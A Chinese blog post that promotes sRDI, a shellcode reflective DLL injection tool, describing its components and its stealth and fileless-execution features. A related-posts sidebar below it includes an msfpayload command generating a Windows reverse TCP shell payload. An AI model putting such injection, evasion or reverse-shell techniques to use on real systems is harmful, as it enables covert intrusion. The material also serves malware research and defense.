探索sRDI:Shellcode Reflective DLL注入的利器!

于 2024-05-12 09:55:33 发布
阅读量354 收藏 7
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00060/article/details/138746275
版权

探索sRDI:Shellcode Reflective DLL注入的利器!

sRDI,即Shellcode Reflective DLL Injection,是一个强大的工具,它能将DLL文件转换为位置无关的shellcode,并提供一个完整的PE加载器,支持适当的段权限、TLS回调以及各种合理性检查。你可以把它看作是一个捆绑在加密DLL上的shellcode PE加载器。

1、项目介绍

这个项目由几个关键组件组成:

  • ShellcodeRDI:编译出DLL加载器的shellcode。
  • NativeLoader:如果需要,将DLL转换为shellcode并注入内存。
  • DotNetLoader:C#实现的NativeLoader。
  • Python脚本:用于将DLL转换为shellcode和编码blob。
  • PowerShell脚本:类似的功能,但适用于Powershell环境。

sRDI的独特之处在于,即使DLL不是用其编译的,也可以与该技术兼容。

2、项目技术分析

sRDI的核心在于将动态链接库(DLL)转化为可在内存中执行的shellcode。通过两个组件协同工作,首先用C项目构建PE加载器到shellcode,然后通过转换代码将DLL、RDI(反射DLL注入)和用户数据合并,再利用引导程序进行注入。此外,项目还提供了多种语言接口,如Python和Powershell,使得操作更加便捷。

3、项目及技术应用场景

理解sReflective DLL Injection的概念后,你会发现sRDI能在以下场景发挥作用:

  • 在无文件环境中执行代码,以避免留下持久化的痕迹。
  • 动态加载或更新软件功能,无需重新启动服务或进程。
  • 模拟恶意软件行为研究,探索防御策略。

4、项目特点

  • 灵活性: 支持C、Python和Powershell等多种编程语言,适应不同的使用场景。
  • 安全性: 提供选项清理头部信息、清除内存,甚至混淆导入表,提高隐蔽性。
  • 跨兼容性: 能处理未使用sRDI编译的DLL,扩展了其应用范围。
  • 易于集成: 可直接嵌入已有的shellcode项目,简化开发流程。

开始你的旅程

要开始使用sRDI,可以尝试以下步骤:

  1. 使用Python脚本将DLL转换为shellcode。
  2. 使用C#或Python加载器将shellcode注入内存。
  3. 或者在Powershell环境中,结合Invoke-Shellcode模块执行shellcode。

要了解更多详情,查看项目文档中的Flags部分,了解如何控制加载逻辑的各种选项。此外,该项目依赖Visual Studio 2019和Windows SDK 10,但同时也提供了一定程度的平台独立性。

如果你对替代方案感兴趣,项目文档也列举了一些其他优秀的内存PE加载器项目。

总的来说,sRDI是一个强大且灵活的工具,无论你是安全研究人员、软件开发者还是逆向工程师,它都值得你一试。立即加入sRDI的世界,开启你的shellcode之旅吧!

荣正青
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
第17节 实战:shellcode进程注入
imbyter师哥的博客
05-15 274
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。传统的exe文件执行都是在自己的进程空间中,而shellcode本身没有固定的执行进程,它取决于加载器将它“安排”到哪个进程,它就在哪个进程执行。这种以进程“寄宿”方式执行的方式就被称为进程注入
Doge-sRDI:Golang的反射式DLL注入Shellcode实现。 将DLL转换为与位置无关的Shellcode
04-01
:frog: 青蛙自动扫描 :dog_face: 总督为国防规避和进攻安全 总督 Golang的反射式DLL注入Shellcode实现。 将DLL转换为与位置无关的Shellcode 非常感谢Sliver项目和leoloobeek 用法 srdi.exe [dllName] [Args(不必要)] [entryPoint(不必要)] PS D:\> .\srdi.exe .\Outflank-PsC.dll Outflank-PsC.bin PS D:\> .\loader.exe .\Outflank-PsC.bin 1 Mess with the banana, die like the... banana? -------------------------------------------------------------------- [+] ProcessName: svchost.exe
DLL注入技术之三注入shellcode
netword12345的专栏
01-05 664
以前两篇博客使用的注入方式都是远程调用了函数:LoadLibraryA,现在使用一种方法是写入一段shellcode然后远程运行它,shellcode会先从peb链表中找到kernel32.dll,然后查找其导出表,找到LoadLibraryA这个函数并调用,以达到加载DLL的目的。要讲的是我把dll的路径字符串配置到了shellcode的尾部,这样改动dll的路径时可以不用变动shellcode。我这里有32位的shellcode与64位的shellcode,都是久经考验过的代码。
64位 SRDI DLL 转换 ShellCode 执行时不加载问题
SugarAndSalt的博客
11-13 250
于是使用 x64dbg 调试看问题到底出在了哪里,经调试发现,程序在运行到 ShellcodeRDI.c 427行时执行了 pSleep 函数,进入睡眠了。执行test.cpp,在命令行得到输出的目标字符串,复制 "Formatted content: " 后面的字符串,粘贴到 Native/Loader.cpp 中 LPSTR rdiShellcode64 = 后面,替换原来的,同时将 test.cpp 中 size= 输出的大小替换 源代码中rdiShellcode64Length的值。
轻松学会cobalt strike插件开发
qq_37561898的博客
11-18 567
的支持是在CobaltStrike4.1版本中新引入的功能。BOF文件是由c代码编译而来的可在Beacon进程中动态加载执行的二进制程序。无文件执行与无新进程创建的特性更加符合OPSEC的原则,适用于严苛的终端对抗场景。低开发门槛与便利的内部Beacon API调用与使得BOF特别适合后渗透阶段攻击工具的快速开发与移植。跟RDI一样关于BOF,CS也提供了相关的文档进行解释和开发介绍BOF C API。
修改jar 注入_反射型DLL注入工具-sRDI
weixin_39858298的博客
10-21 330
反射型DLL注入 DLL 注入首先,我们需要了解什么是反射型DLL注入DLL 注入就是将 DLL(动态链接库,是一个包含可由多个程序,同时使用的代码和数据的库。例如,在 Windows 操作系统中,Comdlg32.dll 执行与对话框有关的常见函数。)放进某个进程的地址空间里,让它成为那个进程的一部分。要实现 DLL 注入,首先需要打开目标进程。DLL 注入也被很多合法软件广泛的使用,但恶意软...
shellcode-to-dll:shellcode 异或加密并生成dll
04-23
4. **DLL动态链接库**:DLL是Windows操作系统中的一种共享库,程序在运行时可以动态地加载和使用其功能。将加密的shellcode放入DLL中,可以在程序运行时解密并执行,提高隐蔽性。 5. **内存注入**:在C++中,可以...
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 515
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
MakeCode:DLL转换为Shellcode
05-19
2. **机器码提取**:DLL中的函数是编译后的机器码,MakeCode需要提取这些函数的机器码,并准备将其转换为Shellcode格式。 3. **Shellcode编码**:提取的机器码需要编码为Shellcode格式,这通常涉及对机器码进行编码...
DLL注入
weixin_51313054的博客
10-20 6788
DLL注入DLL注入原理dll注入实现过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 DLL注入原理 在Windows操作系统中,运行的每一个进程都生活在自己的程序空间中(保护模式),每一个进程都认为自己拥有整个机器的控制权,
红队战术:使用ADSI和反射注入DLL 侦查Active Directory
一个安全路上的菜鸟
10-22 550
文章写的很不错,就用谷歌翻译给翻译过来 https://outflank.nl/blog/2019/10/20/red-team-tactics-active-directory-recon-using-adsi-and-reflective-dlls/ 在此博客文章中,我们将说明如何结合使用C / C ++和Active Directory服务接口(ADSI)从Cobalt Strike枚举Ac...
将普通shellcode转换成 Reflective DLL Injection shellcode
thesum的专栏
04-02 857
步骤 1.利用msfpayload 生成普通的shellcode,如反弹shellcode msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.1.187 LPORT=4444 C 2.将生成的shellcode,放入reflective_dll里面,把shellcode替换掉
shibing624-text2vec-base-chinese模型文件
08-28
shibing624_text2vec-base-chinese模型文件
编程c++ 数据结构理论 树和二叉树
08-28
一直过不了CSP初赛是很多初学者的烦恼,我想和通过写文章的方式帮助初学者通过初赛,学习更多理论知识,通过举栗子的方式让大家懂得更多。
数据之魂:C/C++中序列化与反序列化的奥义
最新发布
08-28
C/C++项目开发是指使用C或C++这两种编程语言来设计和实现软件项目的过程。C和C++都是非常流行和强大的编程语言,广泛应用于系统编程、嵌入式开发、游戏开发、桌面应用程序、高性能服务器和客户端应用程序等多个领域。 ### 示例代码 以下是C++中一个简单的"Hello, World!"程序示例: ```cpp #include <iostream> int main() { std::cout << "Hello, World!" << std::endl; return 0; } ``` 这个程序包含了C++的基本结构,展示了如何使用`iostream`库来输出文本到控制台。 C/C++项目开发是一个复杂的过程,涉及到多个阶段和技能。开发者需要具备扎实的编程能力、良好的设计思维和对工具的熟练使用。
全国大学生电子设计大赛项目合集射频无线资料雷达发射机技术
08-28
全国大学生电子设计大赛项目合集射频无线资料雷达发射机技术提取方式是百度网盘分享地址
keil5-project-master.zip
08-28
keil5-project-master.zip
全国大学生电子设计大赛项目合集视频技术资料AVS游程解码反扫描反量化和反变换优化设计11
08-28
全国大学生电子设计大赛项目合集视频技术资料AVS游程解码反扫描反量化和反变换优化设计[11]提取方式是百度网盘分享地址
深入探索Shellcode与安全漏洞利用
- **可注入性**: Shellcode应尽可能小且不引起反病毒软件的警报,以便在目标系统中成功注入和执行。 - **派生shell**: Shellcode的常见目标是打开一个命令行shell,使攻击者能进一步交互操作被攻破的系统。 4. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

荣正青

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值